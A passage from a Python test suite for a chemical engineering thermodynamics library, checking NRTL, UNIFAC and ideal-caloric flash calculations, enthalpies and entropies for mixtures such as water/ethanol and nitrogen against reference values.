    assert_allclose(xs, xs_expect, rtol=1E-5)
    assert_allclose(ys, ys_expect, rtol=1E-5)
    assert_allclose(V_over_F, V_over_F_expect, rtol=1E-5)
    # Test the flash interface directly
    T_known = m.T
    V_over_F_known = V_over_F_expect
    zs = m.zs
    vodka.flash(T=T_known, VF=V_over_F_known, zs=zs)
    P_known = vodka.P
    xs_known = vodka.xs
    ys_known = vodka.ys
    phase_known = vodka.phase
    # test TP flash gives the same as TVF
    vodka.flash(T=T_known, P=P_known, zs=zs)
    assert_allclose(V_over_F_known, vodka.V_over_F)
    assert_allclose(xs_known, vodka.xs)
    assert_allclose(ys_known, vodka.ys)
    assert vodka.phase == phase_known
    # Test PVF flash gives same as well
    vodka.flash(VF=V_over_F_known, P=P_known, zs=zs)
    assert_allclose(xs_known, vodka.xs)
    assert_allclose(ys_known, vodka.ys)
    # NOTE(review): duplicate of the xs assertion two lines above.
    assert_allclose(xs_known, vodka.xs)
    assert_allclose(T_known, vodka.T)
    assert vodka.phase == phase_known
@pytest.mark.deprecated
def test_NRTL_package():
    """NRTL activity model with asymmetric tau/alpha coefficient input.

    Checks gammas, the temperature-dependent alpha/tau matrices, and bubble
    and dew pressures for a water/ethanol feed.
    """
    m = Mixture(['water', 'ethanol'], zs=[1-.252, .252], T=273.15+70)
    # 6 coefficients per row.
    # Sample parameters from Understanding Distillation Using Column Profile Maps, First Edition.
    # Daniel Beneke, Mark Peters, David Glasser, and Diane Hildebrandt.
    # Nice random example except for the poor prediction ! Dew point is good
    # But the bubble point is 10 kPa too high.
    # Still it is a good test of asymmetric values and the required
    # input form.
    taus = [
        [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [3.458, -586.1, 0, 0, 0, 0]],
        [[-0.801, 246.2, 0, 0, 0, 0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0]]
    ]
    alphas = [[[0.0, 0.0], [0.0, 0.0]],
              [[0.3, 0], [0.0, 0.0]] ]
    pp = Nrtl(tau_coeffs=taus, alpha_coeffs=alphas, VaporPressures=m.VaporPressures, Tms=m.Tms,
              Tcs=m.Tcs, Pcs=m.Pcs, omegas=m.omegas, VolumeLiquids=m.VolumeLiquids,
              HeatCapacityLiquids=m.HeatCapacityLiquids,
              HeatCapacityGases=m.HeatCapacityGases,
              EnthalpyVaporizations=m.EnthalpyVaporizations)
    assert_allclose(pp.gammas(T=m.T, xs=m.zs), [1.1114056946393671, 2.5391220022675163], rtol=1e-6)
    assert_allclose(pp.alphas(m.T), [[0.0, 0.0], [0.3, 0.0]])
    assert_allclose(pp.taus(m.T), [[0.0, 1.7500005828354948], [-0.08352950604691833, 0.0]])
    # Bubble point (VF=0): known to be ~10 kPa high vs experiment (see note above).
    pp.flash(T=m.T, VF=0, zs=m.zs)
    assert_allclose(pp.P, 72190.62175687613, rtol=2e-3)
    # Dew point (VF=1).
    pp.flash(T=m.T, VF=1, zs=m.zs)
    assert_allclose(pp.P, 40485.10473289466, rtol=2e-3)
@pytest.mark.deprecated
def test_NRTL_package_constants():
    """Build an NRTL property package via PropertyPackageConstants and flash it."""
    tau_params = [[[0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [3.458, -586.1, 0, 0, 0, 0]],
                  [[-0.801, 246.2, 0, 0, 0, 0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0]]]
    alpha_params = [[[0.0, 0.0], [0.0, 0.0]],
                    [[0.3, 0], [0.0, 0.0]]]
    component_ids = ['water', 'ethanol']
    # tau_coeffs, alpha_coeffs
    feed = [1-.252, .252]
    constants = PropertyPackageConstants(component_ids, name=NRTL_PKG,
                                         tau_coeffs=tau_params, alpha_coeffs=alpha_params)
    constants.pkg.flash(zs=feed, T=300, VF=0.5)
    # Touch the resulting attributes exactly as the original test did.
    constants.pkg.phase, constants.pkg.P
    assert_allclose(constants.pkg.P, 5763.42373196148, atol=20, rtol=1e-4)
@pytest.mark.deprecated
def test_Unifac_EOS_POY():
    """UNIFAC liquid model combined with PR EOS vapor phis and the Poynting correction."""
    mix = Mixture(['pentane', 'hexane', 'octane'], zs=[.1, .4, .5], T=298.15)
    unifac_pkg = Unifac(UNIFAC_groups=mix.UNIFAC_groups, VaporPressures=mix.VaporPressures,
                        Tms=mix.Tms, Tcs=mix.Tcs, Pcs=mix.Pcs,
                        omegas=mix.omegas, VolumeLiquids=mix.VolumeLiquids, eos=PR, eos_mix=PRMIX)
    # Enable vapor-phase fugacity coefficients and the Poynting correction.
    unifac_pkg.use_phis = True
    unifac_pkg.use_Poynting = True
    unifac_pkg.flash(zs=mix.zs, T=400, VF=0.5)
    expected_xs = [0.04428613261665119, 0.28125472768746834, 0.6744591396958806]
    expected_ys = [0.15571386738334897, 0.518745272312532, 0.32554086030411905]
    assert unifac_pkg.phase == 'l/g'
    assert_allclose(unifac_pkg.xs, expected_xs, rtol=1e-3)
    assert_allclose(unifac_pkg.ys, expected_ys, rtol=1e-3)
    assert_allclose(unifac_pkg.P, 230201.5387679756, rtol=1e-3)
@pytest.mark.fuzz
@pytest.mark.slow
@pytest.mark.deprecated
def test_Unifac_fuzz():
    """Randomized consistency fuzzing of the Unifac package flash interface.

    A T-VF flash fixes the state; TP and P-VF flashes with the resulting
    values must then reproduce the same state.
    """
    m = Mixture(['ethanol', 'water'], zs=[0.5, 0.5], P=5000, T=298.15)
    vodka = Unifac(m.UNIFAC_groups, m.VaporPressures, m.Tms, m.Tcs, m.Pcs)
    for i in range(500):
        zs = [uniform(0, 1) for i in range(2)]
        zs = [i/sum(zs) for i in zs]
        T_known = uniform(274, 513)
        V_over_F_known = uniform(0, 1)
        vodka.flash(T=T_known, VF=V_over_F_known, zs=zs)
        P_known = vodka.P
        xs_known = vodka.xs
        ys_known = vodka.ys
        phase_known = vodka.phase
        # test TP flash gives the same as TVF
        vodka.flash(T=T_known, P=P_known, zs=zs)
        assert_allclose(V_over_F_known, vodka.V_over_F, rtol=1E-5)
        assert_allclose(xs_known, vodka.xs, rtol=1E-5)
        assert_allclose(ys_known, vodka.ys, rtol=1E-5)
        assert vodka.phase == phase_known
        # Test PVF flash gives same as well
        vodka.flash(VF=V_over_F_known, P=P_known, zs=zs)
        assert_allclose(xs_known, vodka.xs)
        assert_allclose(ys_known, vodka.ys)
        # NOTE(review): duplicate of the xs assertion two lines above.
        assert_allclose(xs_known, vodka.xs)
        assert_allclose(T_known, vodka.T)
        assert vodka.phase == phase_known
@pytest.mark.slow
@pytest.mark.deprecated
def test_UnifacDortmund():
    """UNIFAC-Dortmund activity-coefficient package on an ethanol/water flash.

    Same structure as test_Unifac: TP, T-VF, P-VF flashes against reference
    values, then the generic flash interface consistency checks.
    """
    m = Mixture(['ethanol', 'water'], zs=[0.5, 0.5], P=6500, T=298.15)
    vodka = UnifacDortmund(UNIFAC_groups=m.UNIFAC_Dortmund_groups, VaporPressures=m.VaporPressures,
                           Tms=m.Tms, Tcs=m.Tcs, Pcs=m.Pcs)
    # Low pressure ethanol-water ideal TP flash
    phase, xs, ys, V_over_F = vodka.flash_TP_zs(m.T, m.P, m.zs)
    V_over_F_expect = 0.721802969194136
    xs_expect = [0.26331608196660095, 0.736683918033399]
    ys_expect = [0.5912226272910779, 0.408777372708922]
    assert phase == 'l/g'
    assert_allclose(xs, xs_expect)
    assert_allclose(ys, ys_expect)
    assert_allclose(V_over_F, V_over_F_expect)
    # Same flash with T-VF spec
    phase, xs, ys, V_over_F, P = vodka.flash_TVF_zs(m.T, V_over_F_expect, m.zs)
    assert phase == 'l/g'
    assert_allclose(xs, xs_expect, rtol=1E-5)
    assert_allclose(ys, ys_expect, rtol=1E-5)
    assert_allclose(V_over_F, V_over_F_expect, rtol=1E-5)
    # Same flash with P-VF spec
    phase, xs, ys, V_over_F, T = vodka.flash_PVF_zs(m.P, V_over_F_expect, m.zs)
    assert phase == 'l/g'
    assert_allclose(xs, xs_expect, rtol=1E-5)
    assert_allclose(ys, ys_expect, rtol=1E-5)
    assert_allclose(V_over_F, V_over_F_expect, rtol=1E-5)
    # Test the flash interface directly
    T_known = m.T
    V_over_F_known = V_over_F_expect
    zs = m.zs
    vodka.flash(T=T_known, VF=V_over_F_known, zs=zs)
    P_known = vodka.P
    xs_known = vodka.xs
    ys_known = vodka.ys
    phase_known = vodka.phase
    # test TP flash gives the same as TVF
    vodka.flash(T=T_known, P=P_known, zs=zs)
    assert_allclose(V_over_F_known, vodka.V_over_F)
    assert_allclose(xs_known, vodka.xs)
    assert_allclose(ys_known, vodka.ys)
    assert vodka.phase == phase_known
    # Test PVF flash gives same as well
    vodka.flash(VF=V_over_F_known, P=P_known, zs=zs)
    assert_allclose(xs_known, vodka.xs)
    assert_allclose(ys_known, vodka.ys)
    # NOTE(review): duplicate of the xs assertion two lines above.
    assert_allclose(xs_known, vodka.xs)
    assert_allclose(T_known, vodka.T)
    assert vodka.phase == phase_known
@pytest.mark.deprecated
def test_plotting_failures():
    """Binary-only plot helpers must raise when given a three-component package."""
    mix = Mixture(['ethanol', 'methanol', 'water'], zs=[0.3, 0.3, 0.4], P=5000, T=298.15)
    three_comp = Ideal(mix.VaporPressures, mix.Tms, mix.Tcs, mix.Pcs)
    with pytest.raises(Exception):
        three_comp.plot_Pxy(300)
    with pytest.raises(Exception):
        three_comp.plot_Txy(300)
    with pytest.raises(Exception):
        three_comp.plot_xy(300)
@pytest.mark.deprecated
def test_IdealCaloric_single_component_H():
    """Validate the Cpg+Hvap enthalpy scheme of IdealCaloric for pure water.

    Checks: the liquid enthalpy equals -Hvap at the 298.15 K reference;
    gas and liquid enthalpies are pressure independent (with
    P_DEPENDENT_H_LIQ disabled); the gas branch follows the ideal-gas Cp
    integral along/above the saturation curve; H mixes linearly with the
    vapor fraction; and liquid/vapor enthalpies coincide at Tc.
    """
    w = Chemical('water')
    EnthalpyVaporization = w.EnthalpyVaporization
    HeatCapacityGas = w.HeatCapacityGas
    VaporPressure = w.VaporPressure
    m = Mixture(['water'], zs=[1], T=298.15)
    pkg = IdealCaloric(VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs, Tcs=m.Tcs, Pcs=m.Pcs,
                       HeatCapacityLiquids=m.HeatCapacityLiquids, HeatCapacityGases=m.HeatCapacityGases,
                       EnthalpyVaporizations=m.EnthalpyVaporizations, VolumeLiquids=m.VolumeLiquids)
    # Disable pressure dependence of the liquid enthalpy for these checks
    pkg.P_DEPENDENT_H_LIQ = False
    # Check the enthalpy of vaporization matches at the reference temperature
    pkg.flash(T=298.15, P=1E5, zs=m.zs)
    H_pp = pkg.enthalpy_Cpg_Hvap()
    assert_allclose(H_pp, -EnthalpyVaporization(298.15))
    # Check it's pressure independent for the gas (at ref T)
    kw_options = [{'P': w.Psat}, {'P': 100}, {'P': 1E-10}, {'VF': 1}]
    for kw in kw_options:
        pkg.flash(T=298.15, zs=m.zs, **kw)
        H_pp = pkg.enthalpy_Cpg_Hvap()
        assert_allclose(H_pp, 0)
    # Check it's pressure is independent (so long as it stays liquid)
    kw_options = [{'P': w.Psat+1E-4}, {'P': 1E4}, {'P': 1E10}, {'VF': 0}]
    for kw in kw_options:
        pkg.flash(T=298.15, zs=m.zs, **kw)
        H_pp = pkg.enthalpy_Cpg_Hvap()
        assert_allclose(H_pp, -EnthalpyVaporization(298.15))
    # Gas heat capacity along the vapor curve (and above it)
    for T in np.linspace(w.Tm, w.Tc-1):
        for kw in [{'VF': 1}, {'P': VaporPressure(T)*0.5}]:
            pkg.flash(T=T, zs=m.zs, **kw)
            H_pp = pkg.enthalpy_Cpg_Hvap()
            assert_allclose(H_pp, HeatCapacityGas.T_dependent_property_integral(298.15, T))
    # Gas heat capacity plus enthalpy of vaporization along the liquid
    for T in np.linspace(w.Tm, w.Tc-1):
        for kw in [{'VF': 0}, {'P': VaporPressure(T)*1.1}]:
            pkg.flash(T=T, zs=m.zs, **kw)
            H_pp = pkg.enthalpy_Cpg_Hvap()
            H_recalc = (HeatCapacityGas.T_dependent_property_integral(298.15, T)
                        -EnthalpyVaporization(T))
            assert_allclose(H_pp, H_recalc)
    # Just one basic case at VF = 0.5
    T = 298.15
    pkg.flash(T=T, zs=m.zs, VF=0.5)
    assert_allclose(pkg.enthalpy_Cpg_Hvap(), -0.5*EnthalpyVaporization(T))
    # For a variety of vapor fractions and temperatures, check the enthapy is correctly described
    for VF in np.linspace(0., 1, 20):
        for T in np.linspace(w.Tm, w.Tc, 5):
            pkg.flash(T=T, zs=m.zs, VF=VF)
            pkg_calc = pkg.enthalpy_Cpg_Hvap()
            hand_calc = -(1 - VF)*EnthalpyVaporization(T) + HeatCapacityGas.T_dependent_property_integral(298.15, T)
            assert_allclose(pkg_calc, hand_calc)
    # Check the liquid and vapor enthalpies are equal at the critical point
    T = w.Tc
    pkg.flash(T=w.Tc, zs=m.zs, VF=1)
    Hvap_Tc_1 = pkg.enthalpy_Cpg_Hvap()
    pkg.flash(T=w.Tc, zs=m.zs, VF=0)
    Hvap_Tc_0 = pkg.enthalpy_Cpg_Hvap()
    assert_allclose(Hvap_Tc_0, Hvap_Tc_1)
    pkg.flash(T=w.Tc, zs=m.zs, VF=0.5)
    Hvap_Tc_half = pkg.enthalpy_Cpg_Hvap()
    assert_allclose(Hvap_Tc_0, Hvap_Tc_half)
@pytest.mark.deprecated
def test_IdealCaloric_binary_H():
    """Validate the Cpg+Hvap enthalpy scheme of IdealCaloric for a
    water/ethanol binary: mole-fraction-weighted -Hvap at the liquid
    reference state, zero gas enthalpy at the reference T regardless of
    pressure, and a lever-rule hand calculation over random compositions
    at assorted (T, VF) specs.
    """
    m = Mixture(['water', 'ethanol'], zs=[0.3, 0.7], T=298.15)
    pkg = IdealCaloric(VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs, Tcs=m.Tcs, Pcs=m.Pcs,
                       HeatCapacityLiquids=m.HeatCapacityLiquids, HeatCapacityGases=m.HeatCapacityGases,
                       EnthalpyVaporizations=m.EnthalpyVaporizations, VolumeLiquids=m.VolumeLiquids)
    pkg.P_DEPENDENT_H_LIQ = False
    # Check the enthalpy of vaporization matches at the reference temperature (as a liquid)
    pkg.flash(T=298.15, P=1E5, zs=m.zs)
    H_pp = pkg.enthalpy_Cpg_Hvap()
    assert_allclose(H_pp, (-0.3*m.EnthalpyVaporizations[0](298.15) -0.7*m.EnthalpyVaporizations[1](298.15)))
    # Check the enthalpy of 0 matches at the reference temperature (as a gas)
    pkg.flash(T=298.15, VF=1, zs=m.zs)
    assert_allclose(0, pkg.enthalpy_Cpg_Hvap(), atol=1E-9)
    # Check the gas, at various pressure but still Tref, has enthalpy of 0
    pkg.flash(T=298.15, zs=m.zs, VF=1)
    P_dew = pkg.P
    kw_options = [{'P': P_dew}, {'P': 100}, {'P': 1E-10}, {'VF': 1}]
    for kw in kw_options:
        pkg.flash(T=298.15, zs=m.zs, **kw)
        H_pp = pkg.enthalpy_Cpg_Hvap()
        assert_allclose(H_pp, 0, atol=1E-7)
    # Check it's pressure is independent (so long as it stays liquid), has enthalpy of 0
    pkg.flash(T=298.15, zs=m.zs, VF=0)
    P_bubble = pkg.P
    kw_options = [{'P': P_bubble+1E-4}, {'P': 1E4}, {'P': 1E10}, {'VF': 0}]
    for kw in kw_options:
        pkg.flash(T=298.15, zs=m.zs, **kw)
        H_pp = pkg.enthalpy_Cpg_Hvap()
        H_handcalc = -0.3*m.EnthalpyVaporizations[0](298.15) -0.7*m.EnthalpyVaporizations[1](298.15)
        assert_allclose(H_pp, H_handcalc)
    # For a variety of vapor fractions and temperatures, check the enthapy is correctly described
    for VF in np.linspace(0., 1, 6):
        for T in np.linspace(280, 400, 8):
            z1 = uniform(0, 1)
            z2 = 1-z1
            zs = [z1, z2]
            pkg.flash(T=T, zs=zs, VF=VF)
            pkg_calc = pkg.enthalpy_Cpg_Hvap()
            # bad hack as the behavior changed after
            # Bug fix: identity comparison, not equality - `xs == None` may
            # call an arbitrary __eq__ (e.g. elementwise on array types).
            if pkg.xs is None:
                pkg.xs = pkg.zs
            hand_calc =(-(1 - VF)*(pkg.xs[0]*m.EnthalpyVaporizations[0](T) + pkg.xs[1]*m.EnthalpyVaporizations[1](T))
                        + (z1*m.HeatCapacityGases[0].T_dependent_property_integral(298.15, T) + z2*m.HeatCapacityGases[1].T_dependent_property_integral(298.15, T)))
            assert_allclose(pkg_calc, hand_calc)
@pytest.mark.deprecated
def test_IdealCaloric_nitrogen_S():
    """Validate the Cpg+Hvap entropy scheme of IdealCaloric for pure N2.

    Entropy differences between states are compared against CoolProp
    reference values (quoted in the inline comments) within stated error
    bands; condensation entropy at 1 bar scales linearly with VF, and an
    isothermal liquid compression adds no entropy under this model.
    """
    m = Mixture(['nitrogen'], zs=[1], T=298.15)
    pkg = IdealCaloric(VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs, Tcs=m.Tcs, Pcs=m.Pcs,
                       HeatCapacityLiquids=m.HeatCapacityLiquids, HeatCapacityGases=m.HeatCapacityGases,
                       EnthalpyVaporizations=m.EnthalpyVaporizations, VolumeLiquids=m.VolumeLiquids)
    # Check the enthalpy of vaporization matches at the reference temperature for a gas
    pkg.flash(T=298.15, P=101325, zs=m.zs)
    S_pp = pkg.entropy_Cpg_Hvap()
    assert_allclose(S_pp, 0, atol=1E-9)
    # Check a entropy difference vs coolprop (N2)- 1.5% error
    pkg.flash(T=298.15, P=101325, zs=m.zs)
    S1 = pkg.entropy_Cpg_Hvap()
    pkg.flash(T=298.15, P=2000325, zs=m.zs)
    S2 = pkg.entropy_Cpg_Hvap()
    assert_allclose(S2-S1, -25.16418, rtol=0.015) #
    # Check a entropy difference vs coolprop (N2)- 0.3% error
    pkg.flash(T=298.15, P=101325, zs=m.zs)
    S1 = pkg.entropy_Cpg_Hvap()
    pkg.flash(T=298.15, P=102325, zs=m.zs)
    S2 = pkg.entropy_Cpg_Hvap()
    # 0.3% error with 1 kPa difference
    assert_allclose(S2-S1, -0.08184949145277187, rtol=0.003) # PropsSI('SMOLAR', 'T', 298.15, 'P', 102325, 'N2') - PropsSI('SMOLAR', 'T', 298.15, 'P', 101325, 'N2')
    # S2-S1
    # <2.5% error on a 10 MPa/500K N2 vs 298.15 and 1 atm vs coolprop
    pkg.flash(T=298.15, P=101325, zs=m.zs)
    S1 = pkg.entropy_Cpg_Hvap()
    pkg.flash(T=500, P=1E7, zs=m.zs)
    S2 = pkg.entropy_Cpg_Hvap()
    assert_allclose(S2-S1, -23.549468174122012, rtol=0.026) # PropsSI('SMOLAR', 'T', 500, 'P', 1E7, 'N2') - PropsSI('SMOLAR', 'T', 298.15, 'P', 101325, 'N2')
    # Entropy change of condensation at the saturation point of 1 bar - very low error
    pkg.flash(VF=1, P=1E5, zs=m.zs)
    S1 = pkg.entropy_Cpg_Hvap()
    pkg.flash(VF=0, P=1E5, zs=m.zs)
    S2 = pkg.entropy_Cpg_Hvap()
    # T_change = PropsSI('T', 'Q', 0, 'P', 1E5, 'N2') # 77.24349973069587
    # dS = PropsSI('SMOLAR', 'Q', 0, 'T', T_change, 'N2') - PropsSI('SMOLAR', 'Q', 1, 'T', T_change, 'N2')
    assert_allclose(S2 - S1, -72.28618677058911, rtol=5E-4)
    # Same test as before, 50% condensed
    pkg.flash(VF=1, P=1E5, zs=m.zs)
    S1 = pkg.entropy_Cpg_Hvap()
    pkg.flash(VF=0.5, P=1E5, zs=m.zs)
    S2 = pkg.entropy_Cpg_Hvap()
    assert_allclose(S2 - S1, -72.28618677058911/2, rtol=5E-4)
    # Test compressing a liquid doesn't add any entropy
    pkg.flash(VF=0, P=1E5, zs=m.zs)
    S1 = pkg.entropy_Cpg_Hvap()
    T = pkg.T
    pkg.flash(T=T, P=2E5, zs=m.zs)
    S2 = pkg.entropy_Cpg_Hvap()
    assert_allclose(S1-S2, 0)
@pytest.mark.deprecated
def test_IdealCaloric_enthalpy_Cpl_Cpg_Hvap_binary_Tc_ref():
    """Validate the Cpl+Cpg+Hvap enthalpy scheme for water/methanol with
    the phase-transition reference set to each component's Tc.

    Hand calculations integrate the liquid Cp up to Tc, switch to gas Cp
    above it (no explicit Hvap term in this mode), and lever-rule the
    phases at partial vapor fractions; near-identical flashes must give
    near-identical enthalpies.
    """
    w = Chemical('water')
    MeOH = Chemical('methanol')
    m = Mixture(['water', 'methanol'], zs=[0.3, 0.7], T=298.15)
    pkg = IdealCaloric(VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs, Tcs=m.Tcs, Pcs=m.Pcs,
                       HeatCapacityLiquids=m.HeatCapacityLiquids, HeatCapacityGases=m.HeatCapacityGases,
                       EnthalpyVaporizations=m.EnthalpyVaporizations, VolumeLiquids=m.VolumeLiquids)
    pkg.set_T_transitions('Tc')
    # Liquid change only, but to the phase change barrier
    pkg.flash(T=298.15+200, VF=0, zs=m.zs)
    dH = pkg.enthalpy_Cpl_Cpg_Hvap()
    dH_hand = (0.3*w.HeatCapacityLiquid.T_dependent_property_integral(298.15, 298.15+200)
               +0.7*MeOH.HeatCapacityLiquid.T_dependent_property_integral(298.15, 298.15+200))
    assert_allclose(dH, dH_hand)
    # Flash a minute amount - check the calc still works and the value is the same
    pkg.flash(T=298.15+200, VF=1E-7, zs=m.zs)
    dH = pkg.enthalpy_Cpl_Cpg_Hvap()
    assert_allclose(dH, dH_hand, rtol=1E-6)
    # Flash to vapor at methanol's critical point
    pkg.flash(T=MeOH.Tc, VF=1, zs=m.zs)
    dH = pkg.enthalpy_Cpl_Cpg_Hvap()
    dH_hand = (0.7*MeOH.HeatCapacityLiquid.T_dependent_property_integral(298.15, MeOH.Tc)
               +0.3*w.HeatCapacityLiquid.T_dependent_property_integral(298.15, w.Tc)
               + 0.3*w.HeatCapacityGas.T_dependent_property_integral(w.Tc, MeOH.Tc))
    assert_allclose(dH, dH_hand)
    # Flash a minute amount more - check the calc still works and the value is the same
    pkg.flash(T=MeOH.Tc, P=pkg.P*.9999999, zs=m.zs)
    dH_minute_diff = pkg.enthalpy_Cpl_Cpg_Hvap()
    assert_allclose(dH, dH_minute_diff)
    # Again
    pkg.flash(T=MeOH.Tc, VF=0.99999999, zs=m.zs)
    dH_minute_diff = pkg.enthalpy_Cpl_Cpg_Hvap()
    assert_allclose(dH, dH_minute_diff)
    # Do a test with 65% liquid
    T = MeOH.Tc
    pkg.flash(T=T, VF=0.35, zs=m.zs)
    dH = pkg.enthalpy_Cpl_Cpg_Hvap()
    liq_w_dH = pkg.xs[0]*0.65*w.HeatCapacityLiquid.T_dependent_property_integral(298.15, T)
    liq_MeOH_dH = pkg.xs[1]*0.65*MeOH.HeatCapacityLiquid.T_dependent_property_integral(298.15, T)
    dH_w_vapor = 0.35*pkg.ys[0]*(w.HeatCapacityLiquid.T_dependent_property_integral(298.15, w.Tc)
                                 + w.HeatCapacityGas.T_dependent_property_integral(w.Tc, T))
    dH_MeOH_vapor = 0.35*pkg.ys[1]*(MeOH.HeatCapacityLiquid.T_dependent_property_integral(298.15,T)
                                    + MeOH.HeatCapacityGas.T_dependent_property_integral(T, T))
    dH_hand = dH_MeOH_vapor + dH_w_vapor + liq_MeOH_dH + liq_w_dH
    assert_allclose(dH, dH_hand)
    # Full vapor flash, high T
    pkg.flash(T=1200, P=1E7, zs=m.zs)
    dH = pkg.enthalpy_Cpl_Cpg_Hvap()
    liq_w_dH = 0.3*w.HeatCapacityLiquid.T_dependent_property_integral(298.15, w.Tc)
    liq_MeOH_dH = 0.7*MeOH.HeatCapacityLiquid.T_dependent_property_integral(298.15, MeOH.Tc)
    dH_w_vapor = 0.3*w.HeatCapacityGas.T_dependent_property_integral(w.Tc, 1200)
    dH_MeOH_vapor = 0.7*MeOH.HeatCapacityGas.T_dependent_property_integral(MeOH.Tc, 1200)
    dH_hand = liq_w_dH + liq_MeOH_dH + dH_w_vapor + dH_MeOH_vapor
    assert_allclose(dH_hand, dH)
@pytest.mark.deprecated
def test_IdealCaloric_enthalpy_Cpl_Cpg_Hvap_binary_Tb_ref():
    """Validate the Cpl+Cpg+Hvap enthalpy scheme for water/methanol with
    the phase-transition reference set to each component's Tb.

    Unlike the Tc-referenced variant, the hand calculations here add an
    explicit Hvap(Tb) term for each vaporized component on top of the
    liquid-Cp integral to Tb and the gas-Cp integral beyond it.
    """
    w = Chemical('water')
    MeOH = Chemical('methanol')
    m = Mixture(['water', 'methanol'], zs=[0.3, 0.7], T=298.15)
    pkg = IdealCaloric(VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs, Tcs=m.Tcs, Pcs=m.Pcs,
                       HeatCapacityLiquids=m.HeatCapacityLiquids, HeatCapacityGases=m.HeatCapacityGases,
                       EnthalpyVaporizations=m.EnthalpyVaporizations, VolumeLiquids=m.VolumeLiquids)
    pkg.set_T_transitions('Tb')
    # Full vapor flash, high T
    pkg.flash(T=1200, P=1E7, zs=m.zs)
    dH = pkg.enthalpy_Cpl_Cpg_Hvap()
    liq_w_dH = 0.3*w.HeatCapacityLiquid.T_dependent_property_integral(298.15, w.Tb)
    liq_MeOH_dH = 0.7*MeOH.HeatCapacityLiquid.T_dependent_property_integral(298.15, MeOH.Tb)
    dH_w_vapor = 0.3*w.HeatCapacityGas.T_dependent_property_integral(w.Tb, 1200)
    dH_MeOH_vapor = 0.7*MeOH.HeatCapacityGas.T_dependent_property_integral(MeOH.Tb, 1200)
    liq_w_vap = 0.3*w.EnthalpyVaporization(w.Tb)
    liq_MeOH_vap = 0.7*MeOH.EnthalpyVaporization(MeOH.Tb)
    dH_hand = liq_w_dH + liq_MeOH_dH + liq_w_vap + liq_MeOH_vap + dH_w_vapor + dH_MeOH_vapor
    assert_allclose(dH_hand, dH)
    # Liquid change only, but to the phase change barrier
    pkg.flash(T=298.15+200, VF=0, zs=m.zs)
    dH = pkg.enthalpy_Cpl_Cpg_Hvap()
    dH_hand = (0.3*w.HeatCapacityLiquid.T_dependent_property_integral(298.15, 298.15+200)
               +0.7*MeOH.HeatCapacityLiquid.T_dependent_property_integral(298.15, 298.15+200))
    assert_allclose(dH, dH_hand)
    # Flash a minute amount - check the calc still works and the value is the same
    pkg.flash(T=298.15+200, VF=1E-7, zs=m.zs)
    dH = pkg.enthalpy_Cpl_Cpg_Hvap()
    assert_allclose(dH, dH_hand, rtol=1E-6)
    # Flash to vapor at methanol's boiling point
    pkg.flash(T=MeOH.Tb, VF=1, zs=m.zs)
    dH = pkg.enthalpy_Cpl_Cpg_Hvap()
    dH_hand = (0.7*MeOH.HeatCapacityLiquid.T_dependent_property_integral(298.15, MeOH.Tb)
               +0.3*w.HeatCapacityLiquid.T_dependent_property_integral(298.15, w.Tb)
               + 0.3*w.HeatCapacityGas.T_dependent_property_integral(w.Tb, MeOH.Tb)
               + 0.3*w.EnthalpyVaporization(w.Tb)
               + 0.7*MeOH.EnthalpyVaporization(MeOH.Tb))
    assert_allclose(dH, dH_hand)
    # Flash a minute amount more - check the calc still works and the value is the same
    pkg.flash(T=MeOH.Tb, P=pkg.P*.9999999, zs=m.zs)
    dH_minute_diff = pkg.enthalpy_Cpl_Cpg_Hvap()
    assert_allclose(dH, dH_minute_diff)
    # Again
    pkg.flash(T=MeOH.Tb, VF=0.99999999, zs=m.zs)
    dH_minute_diff = pkg.enthalpy_Cpl_Cpg_Hvap()
    assert_allclose(dH, dH_minute_diff)
    # Do a test with 65% liquid
    T = 320
    pkg.flash(T=T, VF=0.35, zs=m.zs)
    dH = pkg.enthalpy_Cpl_Cpg_Hvap()
    liq_w_dH = pkg.xs[0]*0.65*w.HeatCapacityLiquid.T_dependent_property_integral(298.15, T)
    liq_MeOH_dH = pkg.xs[1]*0.65*MeOH.HeatCapacityLiquid.T_dependent_property_integral(298.15, T)
    dH_w_vapor = 0.35*pkg.ys[0]*(w.HeatCapacityLiquid.T_dependent_property_integral(298.15, w.Tb)
                                 + w.HeatCapacityGas.T_dependent_property_integral(w.Tb, T))
    dH_MeOH_vapor = 0.35*pkg.ys[1]*(MeOH.HeatCapacityLiquid.T_dependent_property_integral(298.15, MeOH.Tb)
                                    + MeOH.HeatCapacityGas.T_dependent_property_integral(MeOH.Tb, T))
    liq_w_vap = pkg.ys[0]*0.35*w.EnthalpyVaporization(w.Tb)
    liq_MeOH_vap = pkg.ys[1]*0.35*MeOH.EnthalpyVaporization(MeOH.Tb)
    dH_hand = dH_MeOH_vapor + dH_w_vapor + liq_MeOH_dH + liq_w_dH + liq_MeOH_vap +liq_w_vap
    assert_allclose(dH, dH_hand)
@pytest.mark.deprecated
def test_basic_pure_component_flash_consistency():
    """Round-trip pure-ethane flashes: a P-VF (or T-VF) flash followed by a
    flash at the resulting Hm or Sm must recover the original vapor
    fraction."""
    n_points = 11
    T_spec = 200
    P_spec = 1E6
    # Warm-up construction, result intentionally discarded
    Mixture(['ethane'], zs=[1], VF=0.1, P=P_spec)
    for vf in np.linspace(0, 1, n_points):
        ref = Mixture(['ethane'], zs=[1], VF=vf, P=P_spec)
        from_H = Mixture(['ethane'], zs=[1], Hm=ref.Hm, P=P_spec)
        from_S = Mixture(['ethane'], zs=[1], Sm=ref.Sm, P=P_spec)
        assert_allclose(from_H.VF, vf, rtol=5e-3)
        assert_allclose(from_S.VF, vf, rtol=5e-3)
        # Same consistency check against a T-VF base case
        ref = Mixture(['ethane'], zs=[1], VF=vf, T=T_spec)
        from_S = Mixture(['ethane'], zs=[1], Sm=ref.Sm, T=T_spec)
        assert_allclose(from_S.VF, vf, rtol=5e-3)
@pytest.mark.deprecated
def test_IdealCaloric_PH():
    """P-H flash must invert a T-P flash: solving for T at the enthalpy of
    a known (T, P) state recovers that temperature."""
    mix = Mixture(['pentane', 'hexane', 'octane'], zs=[.1, .4, .5], T=298.15)
